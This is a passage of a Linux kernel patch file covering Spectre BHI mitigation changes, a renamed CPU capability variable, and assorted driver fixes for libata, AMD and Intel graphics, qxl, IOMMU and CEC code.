++	IS_ENABLED(CONFIG_MITIGATION_SPECTRE_BHI) ? BHI_MITIGATION_ON : BHI_MITIGATION_OFF;
+ 
+ static int __init spectre_bhi_parse_cmdline(char *str)
+ {
+@@ -1620,8 +1616,6 @@ static int __init spectre_bhi_parse_cmdline(char *str)
+ 		bhi_mitigation = BHI_MITIGATION_OFF;
+ 	else if (!strcmp(str, "on"))
+ 		bhi_mitigation = BHI_MITIGATION_ON;
+-	else if (!strcmp(str, "auto"))
+-		bhi_mitigation = BHI_MITIGATION_AUTO;
+ 	else
+ 		pr_err("Ignoring unknown spectre_bhi option (%s)", str);
+ 
+@@ -1635,9 +1629,11 @@ static void __init bhi_select_mitigation(void)
+ 		return;
+ 
+ 	/* Retpoline mitigates against BHI unless the CPU has RRSBA behavior */
+-	if (cpu_feature_enabled(X86_FEATURE_RETPOLINE) &&
+-	    !(x86_read_arch_cap_msr() & ARCH_CAP_RRSBA))
+-		return;
++	if (cpu_feature_enabled(X86_FEATURE_RETPOLINE)) {
++		spec_ctrl_disable_kernel_rrsba();
++		if (rrsba_disabled)
++			return;
++	}
+ 
+ 	if (spec_ctrl_bhi_dis())
+ 		return;
+@@ -1649,9 +1645,6 @@ static void __init bhi_select_mitigation(void)
+ 	setup_force_cpu_cap(X86_FEATURE_CLEAR_BHB_LOOP_ON_VMEXIT);
+ 	pr_info("Spectre BHI mitigation: SW BHB clearing on vm exit\n");
+ 
+-	if (bhi_mitigation == BHI_MITIGATION_AUTO)
+-		return;
+-
+ 	/* Mitigate syscalls when the mitigation is forced =on */
+ 	setup_force_cpu_cap(X86_FEATURE_CLEAR_BHB_LOOP);
+ 	pr_info("Spectre BHI mitigation: SW BHB clearing on syscall\n");
+@@ -1884,8 +1877,6 @@ static void update_indir_branch_cond(void)
+ /* Update the static key controlling the MDS CPU buffer clear in idle */
+ static void update_mds_branch_idle(void)
+ {
+-	u64 ia32_cap = x86_read_arch_cap_msr();
+-
+ 	/*
+ 	 * Enable the idle clearing if SMT is active on CPUs which are
+ 	 * affected only by MSBDS and not any other MDS variant.
+@@ -1900,7 +1891,7 @@ static void update_mds_branch_idle(void)
+ 	if (sched_smt_active()) {
+ 		static_branch_enable(&mds_idle_clear);
+ 	} else if (mmio_mitigation == MMIO_MITIGATION_OFF ||
+-		   (ia32_cap & ARCH_CAP_FBSDP_NO)) {
++		   (x86_arch_cap_msr & ARCH_CAP_FBSDP_NO)) {
+ 		static_branch_disable(&mds_idle_clear);
+ 	}
+ }
+@@ -2788,7 +2779,7 @@ static char *pbrsb_eibrs_state(void)
+ 	}
+ }
+ 
+-static const char * const spectre_bhi_state(void)
++static const char *spectre_bhi_state(void)
+ {
+ 	if (!boot_cpu_has_bug(X86_BUG_BHI))
+ 		return "; BHI: Not affected";
+@@ -2796,13 +2787,12 @@ static const char * const spectre_bhi_state(void)
+ 		return "; BHI: BHI_DIS_S";
+ 	else if  (boot_cpu_has(X86_FEATURE_CLEAR_BHB_LOOP))
+ 		return "; BHI: SW loop, KVM: SW loop";
+-	else if (boot_cpu_has(X86_FEATURE_RETPOLINE) &&
+-		 !(x86_read_arch_cap_msr() & ARCH_CAP_RRSBA))
++	else if (boot_cpu_has(X86_FEATURE_RETPOLINE) && rrsba_disabled)
+ 		return "; BHI: Retpoline";
+-	else if  (boot_cpu_has(X86_FEATURE_CLEAR_BHB_LOOP_ON_VMEXIT))
+-		return "; BHI: Syscall hardening, KVM: SW loop";
++	else if (boot_cpu_has(X86_FEATURE_CLEAR_BHB_LOOP_ON_VMEXIT))
++		return "; BHI: Vulnerable, KVM: SW loop";
+ 
+-	return "; BHI: Vulnerable (Syscall hardening enabled)";
++	return "; BHI: Vulnerable";
+ }
+ 
+ static ssize_t spectre_v2_show_state(char *buf)
+diff --git a/arch/x86/kernel/cpu/common.c b/arch/x86/kernel/cpu/common.c
+index 08fe77d2a3f90..f2bc651c0dcd8 100644
+--- a/arch/x86/kernel/cpu/common.c
++++ b/arch/x86/kernel/cpu/common.c
+@@ -1308,25 +1308,25 @@ static bool __init cpu_matches(const struct x86_cpu_id *table, unsigned long whi
+ 
+ u64 x86_read_arch_cap_msr(void)
+ {
+-	u64 ia32_cap = 0;
++	u64 x86_arch_cap_msr = 0;
+ 
+ 	if (boot_cpu_has(X86_FEATURE_ARCH_CAPABILITIES))
+-		rdmsrl(MSR_IA32_ARCH_CAPABILITIES, ia32_cap);
++		rdmsrl(MSR_IA32_ARCH_CAPABILITIES, x86_arch_cap_msr);
+ 
+-	return ia32_cap;
++	return x86_arch_cap_msr;
+ }
+ 
+-static bool arch_cap_mmio_immune(u64 ia32_cap)
++static bool arch_cap_mmio_immune(u64 x86_arch_cap_msr)
+ {
+-	return (ia32_cap & ARCH_CAP_FBSDP_NO &&
+-		ia32_cap & ARCH_CAP_PSDP_NO &&
+-		ia32_cap & ARCH_CAP_SBDR_SSDP_NO);
++	return (x86_arch_cap_msr & ARCH_CAP_FBSDP_NO &&
++		x86_arch_cap_msr & ARCH_CAP_PSDP_NO &&
++		x86_arch_cap_msr & ARCH_CAP_SBDR_SSDP_NO);
+ }
+ 
+-static bool __init vulnerable_to_rfds(u64 ia32_cap)
++static bool __init vulnerable_to_rfds(u64 x86_arch_cap_msr)
+ {
+ 	/* The "immunity" bit trumps everything else: */
+-	if (ia32_cap & ARCH_CAP_RFDS_NO)
++	if (x86_arch_cap_msr & ARCH_CAP_RFDS_NO)
+ 		return false;
+ 
+ 	/*
+@@ -1334,7 +1334,7 @@ static bool __init vulnerable_to_rfds(u64 ia32_cap)
+ 	 * indicate that mitigation is needed because guest is running on a
+ 	 * vulnerable hardware or may migrate to such hardware:
+ 	 */
+-	if (ia32_cap & ARCH_CAP_RFDS_CLEAR)
++	if (x86_arch_cap_msr & ARCH_CAP_RFDS_CLEAR)
+ 		return true;
+ 
+ 	/* Only consult the blacklist when there is no enumeration: */
+@@ -1343,11 +1343,11 @@ static bool __init vulnerable_to_rfds(u64 ia32_cap)
+ 
+ static void __init cpu_set_bug_bits(struct cpuinfo_x86 *c)
+ {
+-	u64 ia32_cap = x86_read_arch_cap_msr();
++	u64 x86_arch_cap_msr = x86_read_arch_cap_msr();
+ 
+ 	/* Set ITLB_MULTIHIT bug if cpu is not in the whitelist and not mitigated */
+ 	if (!cpu_matches(cpu_vuln_whitelist, NO_ITLB_MULTIHIT) &&
+-	    !(ia32_cap & ARCH_CAP_PSCHANGE_MC_NO))
++	    !(x86_arch_cap_msr & ARCH_CAP_PSCHANGE_MC_NO))
+ 		setup_force_cpu_bug(X86_BUG_ITLB_MULTIHIT);
+ 
+ 	if (cpu_matches(cpu_vuln_whitelist, NO_SPECULATION))
+@@ -1359,7 +1359,7 @@ static void __init cpu_set_bug_bits(struct cpuinfo_x86 *c)
+ 		setup_force_cpu_bug(X86_BUG_SPECTRE_V2);
+ 
+ 	if (!cpu_matches(cpu_vuln_whitelist, NO_SSB) &&
+-	    !(ia32_cap & ARCH_CAP_SSB_NO) &&
++	    !(x86_arch_cap_msr & ARCH_CAP_SSB_NO) &&
+ 	   !cpu_has(c, X86_FEATURE_AMD_SSB_NO))
+ 		setup_force_cpu_bug(X86_BUG_SPEC_STORE_BYPASS);
+ 
+@@ -1367,15 +1367,15 @@ static void __init cpu_set_bug_bits(struct cpuinfo_x86 *c)
+ 	 * AMD's AutoIBRS is equivalent to Intel's eIBRS - use the Intel feature
+ 	 * flag and protect from vendor-specific bugs via the whitelist.
+ 	 */
+-	if ((ia32_cap & ARCH_CAP_IBRS_ALL) || cpu_has(c, X86_FEATURE_AUTOIBRS)) {
++	if ((x86_arch_cap_msr & ARCH_CAP_IBRS_ALL) || cpu_has(c, X86_FEATURE_AUTOIBRS)) {
+ 		setup_force_cpu_cap(X86_FEATURE_IBRS_ENHANCED);
+ 		if (!cpu_matches(cpu_vuln_whitelist, NO_EIBRS_PBRSB) &&
+-		    !(ia32_cap & ARCH_CAP_PBRSB_NO))
++		    !(x86_arch_cap_msr & ARCH_CAP_PBRSB_NO))
+ 			setup_force_cpu_bug(X86_BUG_EIBRS_PBRSB);
+ 	}
+ 
+ 	if (!cpu_matches(cpu_vuln_whitelist, NO_MDS) &&
+-	    !(ia32_cap & ARCH_CAP_MDS_NO)) {
++	    !(x86_arch_cap_msr & ARCH_CAP_MDS_NO)) {
+ 		setup_force_cpu_bug(X86_BUG_MDS);
+ 		if (cpu_matches(cpu_vuln_whitelist, MSBDS_ONLY))
+ 			setup_force_cpu_bug(X86_BUG_MSBDS_ONLY);
+@@ -1394,9 +1394,9 @@ static void __init cpu_set_bug_bits(struct cpuinfo_x86 *c)
+ 	 * TSX_CTRL check alone is not sufficient for cases when the microcode
+ 	 * update is not present or running as guest that don't get TSX_CTRL.
+ 	 */
+-	if (!(ia32_cap & ARCH_CAP_TAA_NO) &&
++	if (!(x86_arch_cap_msr & ARCH_CAP_TAA_NO) &&
+ 	    (cpu_has(c, X86_FEATURE_RTM) ||
+-	     (ia32_cap & ARCH_CAP_TSX_CTRL_MSR)))
++	     (x86_arch_cap_msr & ARCH_CAP_TSX_CTRL_MSR)))
+ 		setup_force_cpu_bug(X86_BUG_TAA);
+ 
+ 	/*
+@@ -1422,7 +1422,7 @@ static void __init cpu_set_bug_bits(struct cpuinfo_x86 *c)
+ 	 * Set X86_BUG_MMIO_UNKNOWN for CPUs that are neither in the blacklist,
+ 	 * nor in the whitelist and also don't enumerate MSR ARCH_CAP MMIO bits.
+ 	 */
+-	if (!arch_cap_mmio_immune(ia32_cap)) {
++	if (!arch_cap_mmio_immune(x86_arch_cap_msr)) {
+ 		if (cpu_matches(cpu_vuln_blacklist, MMIO))
+ 			setup_force_cpu_bug(X86_BUG_MMIO_STALE_DATA);
+ 		else if (!cpu_matches(cpu_vuln_whitelist, NO_MMIO))
+@@ -1430,7 +1430,7 @@ static void __init cpu_set_bug_bits(struct cpuinfo_x86 *c)
+ 	}
+ 
+ 	if (!cpu_has(c, X86_FEATURE_BTC_NO)) {
+-		if (cpu_matches(cpu_vuln_blacklist, RETBLEED) || (ia32_cap & ARCH_CAP_RSBA))
++		if (cpu_matches(cpu_vuln_blacklist, RETBLEED) || (x86_arch_cap_msr & ARCH_CAP_RSBA))
+ 			setup_force_cpu_bug(X86_BUG_RETBLEED);
+ 	}
+ 
+@@ -1443,7 +1443,7 @@ static void __init cpu_set_bug_bits(struct cpuinfo_x86 *c)
+ 	 * disabling AVX2. The only way to do this in HW is to clear XCR0[2],
+ 	 * which means that AVX will be disabled.
+ 	 */
+-	if (cpu_matches(cpu_vuln_blacklist, GDS) && !(ia32_cap & ARCH_CAP_GDS_NO) &&
++	if (cpu_matches(cpu_vuln_blacklist, GDS) && !(x86_arch_cap_msr & ARCH_CAP_GDS_NO) &&
+ 	    boot_cpu_has(X86_FEATURE_AVX))
+ 		setup_force_cpu_bug(X86_BUG_GDS);
+ 
+@@ -1452,11 +1452,11 @@ static void __init cpu_set_bug_bits(struct cpuinfo_x86 *c)
+ 			setup_force_cpu_bug(X86_BUG_SRSO);
+ 	}
+ 
+-	if (vulnerable_to_rfds(ia32_cap))
++	if (vulnerable_to_rfds(x86_arch_cap_msr))
+ 		setup_force_cpu_bug(X86_BUG_RFDS);
+ 
+ 	/* When virtualized, eIBRS could be hidden, assume vulnerable */
+-	if (!(ia32_cap & ARCH_CAP_BHI_NO) &&
++	if (!(x86_arch_cap_msr & ARCH_CAP_BHI_NO) &&
+ 	    !cpu_matches(cpu_vuln_whitelist, NO_BHI) &&
+ 	    (boot_cpu_has(X86_FEATURE_IBRS_ENHANCED) ||
+ 	     boot_cpu_has(X86_FEATURE_HYPERVISOR)))
+@@ -1466,7 +1466,7 @@ static void __init cpu_set_bug_bits(struct cpuinfo_x86 *c)
+ 		return;
+ 
+ 	/* Rogue Data Cache Load? No! */
+-	if (ia32_cap & ARCH_CAP_RDCL_NO)
++	if (x86_arch_cap_msr & ARCH_CAP_RDCL_NO)
+ 		return;
+ 
+ 	setup_force_cpu_bug(X86_BUG_CPU_MELTDOWN);
+diff --git a/drivers/ata/libata-scsi.c b/drivers/ata/libata-scsi.c
+index a09548630fc8b..65fde5717928b 100644
+--- a/drivers/ata/libata-scsi.c
++++ b/drivers/ata/libata-scsi.c
+@@ -4667,7 +4667,7 @@ void ata_scsi_dev_rescan(struct work_struct *work)
+ 			 * bail out.
+ 			 */
+ 			if (ap->pflags & ATA_PFLAG_SUSPENDED)
+-				goto unlock;
++				goto unlock_ap;
+ 
+ 			if (!sdev)
+ 				continue;
+@@ -4680,7 +4680,7 @@ void ata_scsi_dev_rescan(struct work_struct *work)
+ 			if (do_resume) {
+ 				ret = scsi_resume_device(sdev);
+ 				if (ret == -EWOULDBLOCK)
+-					goto unlock;
++					goto unlock_scan;
+ 				dev->flags &= ~ATA_DFLAG_RESUMING;
+ 			}
+ 			ret = scsi_rescan_device(sdev);
+@@ -4688,12 +4688,13 @@ void ata_scsi_dev_rescan(struct work_struct *work)
+ 			spin_lock_irqsave(ap->lock, flags);
+ 
+ 			if (ret)
+-				goto unlock;
++				goto unlock_ap;
+ 		}
+ 	}
+ 
+-unlock:
++unlock_ap:
+ 	spin_unlock_irqrestore(ap->lock, flags);
++unlock_scan:
+ 	mutex_unlock(&ap->scsi_scan_mutex);
+ 
+ 	/* Reschedule with a delay if scsi_rescan_device() returned an error */
+diff --git a/drivers/gpu/drm/amd/amdgpu/soc21.c b/drivers/gpu/drm/amd/amdgpu/soc21.c
+index 56af7b5abac14..56cc59629d96b 100644
+--- a/drivers/gpu/drm/amd/amdgpu/soc21.c
++++ b/drivers/gpu/drm/amd/amdgpu/soc21.c
+@@ -460,10 +460,8 @@ static bool soc21_need_full_reset(struct amdgpu_device *adev)
+ {
+ 	switch (adev->ip_versions[GC_HWIP][0]) {
+ 	case IP_VERSION(11, 0, 0):
+-		return amdgpu_ras_is_supported(adev, AMDGPU_RAS_BLOCK__UMC);
+ 	case IP_VERSION(11, 0, 2):
+ 	case IP_VERSION(11, 0, 3):
+-		return false;
+ 	default:
+ 		return true;
+ 	}
+@@ -780,10 +778,35 @@ static int soc21_common_suspend(void *handle)
+ 	return soc21_common_hw_fini(adev);
+ }
+ 
++static bool soc21_need_reset_on_resume(struct amdgpu_device *adev)
++{
++	u32 sol_reg1, sol_reg2;
++
++	/* Will reset for the following suspend abort cases.
++	 * 1) Only reset dGPU side.
++	 * 2) S3 suspend got aborted and TOS is active.
++	 */
++	if (!(adev->flags & AMD_IS_APU) && adev->in_s3 &&
++	    !adev->suspend_complete) {
++		sol_reg1 = RREG32_SOC15(MP0, 0, regMP0_SMN_C2PMSG_81);
++		msleep(100);
++		sol_reg2 = RREG32_SOC15(MP0, 0, regMP0_SMN_C2PMSG_81);
++
++		return (sol_reg1 != sol_reg2);
++	}
++
++	return false;
++}
++
+ static int soc21_common_resume(void *handle)
+ {
+ 	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
+ 
++	if (soc21_need_reset_on_resume(adev)) {
++		dev_info(adev->dev, "S3 suspend aborted, resetting...");
++		soc21_asic_reset(adev);
++	}
++
+ 	return soc21_common_hw_init(adev);
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_device_queue_manager.c b/drivers/gpu/drm/amd/amdkfd/kfd_device_queue_manager.c
+index 0b87034d9dd51..1b7b294264804 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_device_queue_manager.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_device_queue_manager.c
+@@ -1805,6 +1805,7 @@ static int unmap_queues_cpsch(struct device_queue_manager *dqm,
+ 		pr_err("HIQ MQD's queue_doorbell_id0 is not 0, Queue preemption time out\n");
+ 		while (halt_if_hws_hang)
+ 			schedule();
++		kfd_hws_hang(dqm);
+ 		return -ETIME;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn316/dcn316_clk_mgr.c b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn316/dcn316_clk_mgr.c
+index 187f5b27fdc80..29d2003fb7129 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn316/dcn316_clk_mgr.c
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn316/dcn316_clk_mgr.c
+@@ -112,20 +112,25 @@ static int dcn316_get_active_display_cnt_wa(
+ 	return display_count;
+ }
+ 
+-static void dcn316_disable_otg_wa(struct clk_mgr *clk_mgr_base, struct dc_state *context, bool disable)
++static void dcn316_disable_otg_wa(struct clk_mgr *clk_mgr_base, struct dc_state *context,
++		bool safe_to_lower, bool disable)
+ {
+ 	struct dc *dc = clk_mgr_base->ctx->dc;
+ 	int i;
+ 
+ 	for (i = 0; i < dc->res_pool->pipe_count; ++i) {
+-		struct pipe_ctx *pipe = &dc->current_state->res_ctx.pipe_ctx[i];
++		struct pipe_ctx *pipe = safe_to_lower
++			? &context->res_ctx.pipe_ctx[i]
++			: &dc->current_state->res_ctx.pipe_ctx[i];
+ 
+ 		if (pipe->top_pipe || pipe->prev_odm_pipe)
+ 			continue;
+-		if (pipe->stream && (pipe->stream->dpms_off || pipe->plane_state == NULL ||
+-				     dc_is_virtual_signal(pipe->stream->signal))) {
++		if (pipe->stream && (pipe->stream->dpms_off || dc_is_virtual_signal(pipe->stream->signal) ||
++				     !pipe->stream->link_enc)) {
+ 			if (disable) {
+-				pipe->stream_res.tg->funcs->immediate_disable_crtc(pipe->stream_res.tg);
++				if (pipe->stream_res.tg && pipe->stream_res.tg->funcs->immediate_disable_crtc)
++					pipe->stream_res.tg->funcs->immediate_disable_crtc(pipe->stream_res.tg);
++
+ 				reset_sync_context_for_pipe(dc, context, i);
+ 			} else
+ 				pipe->stream_res.tg->funcs->enable_crtc(pipe->stream_res.tg);
+@@ -222,11 +227,11 @@ static void dcn316_update_clocks(struct clk_mgr *clk_mgr_base,
+ 	}
+ 
+ 	if (should_set_clock(safe_to_lower, new_clocks->dispclk_khz, clk_mgr_base->clks.dispclk_khz)) {
+-		dcn316_disable_otg_wa(clk_mgr_base, context, true);
++		dcn316_disable_otg_wa(clk_mgr_base, context, safe_to_lower, true);
+ 
+ 		clk_mgr_base->clks.dispclk_khz = new_clocks->dispclk_khz;
+ 		dcn316_smu_set_dispclk(clk_mgr, clk_mgr_base->clks.dispclk_khz);
+-		dcn316_disable_otg_wa(clk_mgr_base, context, false);
++		dcn316_disable_otg_wa(clk_mgr_base, context, safe_to_lower, false);
+ 
+ 		update_dispclk = true;
+ 	}
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c
+index 6d9760eac16d8..21b374d121819 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c
+@@ -222,8 +222,18 @@ static int smu_v13_0_4_system_features_control(struct smu_context *smu, bool en)
+ 	struct amdgpu_device *adev = smu->adev;
+ 	int ret = 0;
+ 
+-	if (!en && !adev->in_s0ix)
++	if (!en && !adev->in_s0ix) {
++		/* Adds a GFX reset as workaround just before sending the
++		 * MP1_UNLOAD message to prevent GC/RLC/PMFW from entering
++		 * an invalid state.
++		 */
++		ret = smu_cmn_send_smc_msg_with_param(smu, SMU_MSG_GfxDeviceDriverReset,
++						      SMU_RESET_MODE_2, NULL);
++		if (ret)
++			return ret;
++
+ 		ret = smu_cmn_send_smc_msg(smu, SMU_MSG_PrepareMp1ForUnload, NULL);
++	}
+ 
+ 	return ret;
+ }
+diff --git a/drivers/gpu/drm/ast/ast_dp.c b/drivers/gpu/drm/ast/ast_dp.c
+index 56483860306b4..a4a23b9623ad3 100644
+--- a/drivers/gpu/drm/ast/ast_dp.c
++++ b/drivers/gpu/drm/ast/ast_dp.c
+@@ -190,6 +190,7 @@ void ast_dp_set_on_off(struct drm_device *dev, bool on)
+ {
+ 	struct ast_private *ast = to_ast_private(dev);
+ 	u8 video_on_off = on;
++	u32 i = 0;
+ 
+ 	// Video On/Off
+ 	ast_set_index_reg_mask(ast, AST_IO_CRTC_PORT, 0xE3, (u8) ~AST_DP_VIDEO_ENABLE, on);
+@@ -202,6 +203,8 @@ void ast_dp_set_on_off(struct drm_device *dev, bool on)
+ 						ASTDP_MIRROR_VIDEO_ENABLE) != video_on_off) {
+ 			// wait 1 ms
+ 			mdelay(1);
++			if (++i > 200)
++				break;
+ 		}
+ 	}
+ }
+diff --git a/drivers/gpu/drm/drm_client_modeset.c b/drivers/gpu/drm/drm_client_modeset.c
+index 7847020de0a49..9a65806047b5e 100644
+--- a/drivers/gpu/drm/drm_client_modeset.c
++++ b/drivers/gpu/drm/drm_client_modeset.c
+@@ -781,6 +781,7 @@ int drm_client_modeset_probe(struct drm_client_dev *client, unsigned int width,
+ 	unsigned int total_modes_count = 0;
+ 	struct drm_client_offset *offsets;
+ 	unsigned int connector_count = 0;
++	/* points to modes protected by mode_config.mutex */
+ 	struct drm_display_mode **modes;
+ 	struct drm_crtc **crtcs;
+ 	int i, ret = 0;
+@@ -849,7 +850,6 @@ int drm_client_modeset_probe(struct drm_client_dev *client, unsigned int width,
+ 		drm_client_pick_crtcs(client, connectors, connector_count,
+ 				      crtcs, modes, 0, width, height);
+ 	}
+-	mutex_unlock(&dev->mode_config.mutex);
+ 
+ 	drm_client_modeset_release(client);
+ 
+@@ -879,6 +879,7 @@ int drm_client_modeset_probe(struct drm_client_dev *client, unsigned int width,
+ 			modeset->y = offset->y;
+ 		}
+ 	}
++	mutex_unlock(&dev->mode_config.mutex);
+ 
+ 	mutex_unlock(&client->modeset_mutex);
+ out:
+diff --git a/drivers/gpu/drm/i915/display/intel_cdclk.c b/drivers/gpu/drm/i915/display/intel_cdclk.c
+index 25dcdde5feb69..5147718f38d6a 100644
+--- a/drivers/gpu/drm/i915/display/intel_cdclk.c
++++ b/drivers/gpu/drm/i915/display/intel_cdclk.c
+@@ -2152,7 +2152,7 @@ intel_set_cdclk_pre_plane_update(struct intel_atomic_state *state)
+ 				 &new_cdclk_state->actual))
+ 		return;
+ 
+-	if (pipe == INVALID_PIPE ||
++	if (new_cdclk_state->disable_pipes ||
+ 	    old_cdclk_state->actual.cdclk <= new_cdclk_state->actual.cdclk) {
+ 		drm_WARN_ON(&dev_priv->drm, !new_cdclk_state->base.changed);
+ 
+@@ -2181,7 +2181,7 @@ intel_set_cdclk_post_plane_update(struct intel_atomic_state *state)
+ 				 &new_cdclk_state->actual))
+ 		return;
+ 
+-	if (pipe != INVALID_PIPE &&
++	if (!new_cdclk_state->disable_pipes &&
+ 	    old_cdclk_state->actual.cdclk > new_cdclk_state->actual.cdclk) {
+ 		drm_WARN_ON(&dev_priv->drm, !new_cdclk_state->base.changed);
+ 
+@@ -2634,6 +2634,7 @@ static struct intel_global_state *intel_cdclk_duplicate_state(struct intel_globa
+ 		return NULL;
+ 
+ 	cdclk_state->pipe = INVALID_PIPE;
++	cdclk_state->disable_pipes = false;
+ 
+ 	return &cdclk_state->base;
+ }
+@@ -2793,6 +2794,8 @@ int intel_modeset_calc_cdclk(struct intel_atomic_state *state)
+ 		if (ret)
+ 			return ret;
+ 
++		new_cdclk_state->disable_pipes = true;
++
+ 		drm_dbg_kms(&dev_priv->drm,
+ 			    "Modeset required for cdclk change\n");
+ 	}
+diff --git a/drivers/gpu/drm/i915/display/intel_cdclk.h b/drivers/gpu/drm/i915/display/intel_cdclk.h
+index c674879a84a58..c4b3e5938bb3f 100644
+--- a/drivers/gpu/drm/i915/display/intel_cdclk.h
++++ b/drivers/gpu/drm/i915/display/intel_cdclk.h
+@@ -51,6 +51,9 @@ struct intel_cdclk_state {
+ 
+ 	/* bitmask of active pipes */
+ 	u8 active_pipes;
++
++	/* update cdclk with pipes disabled */
++	bool disable_pipes;
+ };
+ 
+ int intel_crtc_compute_min_cdclk(const struct intel_crtc_state *crtc_state);
+diff --git a/drivers/gpu/drm/i915/display/intel_ddi.c b/drivers/gpu/drm/i915/display/intel_ddi.c
+index 706e2d956801d..76277eb3eb252 100644
+--- a/drivers/gpu/drm/i915/display/intel_ddi.c
++++ b/drivers/gpu/drm/i915/display/intel_ddi.c
+@@ -3683,7 +3683,12 @@ static bool m_n_equal(const struct intel_link_m_n *m_n_1,
+ static bool crtcs_port_sync_compatible(const struct intel_crtc_state *crtc_state1,
+ 				       const struct intel_crtc_state *crtc_state2)
+ {
++	/*
++	 * FIXME the modeset sequence is currently wrong and
++	 * can't deal with bigjoiner + port sync at the same time.
++	 */
+ 	return crtc_state1->hw.active && crtc_state2->hw.active &&
++		!crtc_state1->bigjoiner_pipes && !crtc_state2->bigjoiner_pipes &&
+ 		crtc_state1->output_types == crtc_state2->output_types &&
+ 		crtc_state1->output_format == crtc_state2->output_format &&
+ 		crtc_state1->lane_count == crtc_state2->lane_count &&
+diff --git a/drivers/gpu/drm/i915/display/intel_vrr.c b/drivers/gpu/drm/i915/display/intel_vrr.c
+index 5eac99021875e..6615e4153f37a 100644
+--- a/drivers/gpu/drm/i915/display/intel_vrr.c
++++ b/drivers/gpu/drm/i915/display/intel_vrr.c
+@@ -110,6 +110,13 @@ intel_vrr_compute_config(struct intel_crtc_state *crtc_state,
+ 	if (!intel_vrr_is_capable(connector))
+ 		return;
+ 
++	/*
++	 * FIXME all joined pipes share the same transcoder.
++	 * Need to account for that during VRR toggle/push/etc.
++	 */
++	if (crtc_state->bigjoiner_pipes)
++		return;
++
+ 	if (adjusted_mode->flags & DRM_MODE_FLAG_INTERLACE)
+ 		return;
+ 
+diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/bios/shadowof.c b/drivers/gpu/drm/nouveau/nvkm/subdev/bios/shadowof.c
+index 4bf486b571013..cb05f7f48a98b 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/subdev/bios/shadowof.c
++++ b/drivers/gpu/drm/nouveau/nvkm/subdev/bios/shadowof.c
+@@ -66,11 +66,16 @@ of_init(struct nvkm_bios *bios, const char *name)
+ 	return ERR_PTR(-EINVAL);
+ }
+ 
++static void of_fini(void *p)
++{
++	kfree(p);
++}
++
+ const struct nvbios_source
+ nvbios_of = {
+ 	.name = "OpenFirmware",
+ 	.init = of_init,
+-	.fini = (void(*)(void *))kfree,
++	.fini = of_fini,
+ 	.read = of_read,
+ 	.size = of_size,
+ 	.rw = false,
+diff --git a/drivers/gpu/drm/qxl/qxl_release.c b/drivers/gpu/drm/qxl/qxl_release.c
+index 368d26da0d6a2..9febc8b73f09e 100644
+--- a/drivers/gpu/drm/qxl/qxl_release.c
++++ b/drivers/gpu/drm/qxl/qxl_release.c
+@@ -58,16 +58,56 @@ static long qxl_fence_wait(struct dma_fence *fence, bool intr,
+ 			   signed long timeout)
+ {
+ 	struct qxl_device *qdev;
++	struct qxl_release *release;
++	int count = 0, sc = 0;
++	bool have_drawable_releases;
+ 	unsigned long cur, end = jiffies + timeout;
+ 
+ 	qdev = container_of(fence->lock, struct qxl_device, release_lock);
++	release = container_of(fence, struct qxl_release, base);
++	have_drawable_releases = release->type == QXL_RELEASE_DRAWABLE;
+ 
+-	if (!wait_event_timeout(qdev->release_event,
+-				(dma_fence_is_signaled(fence) ||
+-				 (qxl_io_notify_oom(qdev), 0)),
+-				timeout))
+-		return 0;
++retry:
++	sc++;
++
++	if (dma_fence_is_signaled(fence))
++		goto signaled;
++
++	qxl_io_notify_oom(qdev);
++
++	for (count = 0; count < 11; count++) {
++		if (!qxl_queue_garbage_collect(qdev, true))
++			break;
++
++		if (dma_fence_is_signaled(fence))
++			goto signaled;
++	}
++
++	if (dma_fence_is_signaled(fence))
++		goto signaled;
++
++	if (have_drawable_releases || sc < 4) {
++		if (sc > 2)
++			/* back off */
++			usleep_range(500, 1000);
++
++		if (time_after(jiffies, end))
++			return 0;
++
++		if (have_drawable_releases && sc > 300) {
++			DMA_FENCE_WARN(fence,
++				       "failed to wait on release %llu after spincount %d\n",
++				       fence->context & ~0xf0000000, sc);
++			goto signaled;
++		}
++		goto retry;
++	}
++	/*
++	 * yeah, original sync_obj_wait gave up after 3 spins when
++	 * have_drawable_releases is not set.
++	 */
+ 
++signaled:
+ 	cur = jiffies;
+ 	if (time_after(cur, end))
+ 		return 0;
+diff --git a/drivers/iommu/intel/svm.c b/drivers/iommu/intel/svm.c
+index 03b25358946c4..cb862ab96873e 100644
+--- a/drivers/iommu/intel/svm.c
++++ b/drivers/iommu/intel/svm.c
+@@ -71,7 +71,7 @@ int intel_svm_enable_prq(struct intel_iommu *iommu)
+ 	struct page *pages;
+ 	int irq, ret;
+ 
+-	pages = alloc_pages(GFP_KERNEL | __GFP_ZERO, PRQ_ORDER);
++	pages = alloc_pages_node(iommu->node, GFP_KERNEL | __GFP_ZERO, PRQ_ORDER);
+ 	if (!pages) {
+ 		pr_warn("IOMMU: %s: Failed to allocate page request queue\n",
+ 			iommu->name);
+diff --git a/drivers/media/cec/core/cec-adap.c b/drivers/media/cec/core/cec-adap.c
+index 4bc2a705029e6..c761ac35e120d 100644
+--- a/drivers/media/cec/core/cec-adap.c
++++ b/drivers/media/cec/core/cec-adap.c
+@@ -1121,20 +1121,6 @@ void cec_received_msg_ts(struct cec_adapter *adap,
+ 	if (valid_la && min_len) {
+ 		/* These messages have special length requirements */
+ 		switch (cmd) {
+-		case CEC_MSG_TIMER_STATUS:
+-			if (msg->msg[2] & 0x10) {
+-				switch (msg->msg[2] & 0xf) {
+-				case CEC_OP_PROG_INFO_NOT_ENOUGH_SPACE:
+-				case CEC_OP_PROG_INFO_MIGHT_NOT_BE_ENOUGH_SPACE:
+-					if (msg->len < 5)
+-						valid_la = false;
+-					break;
+-				}
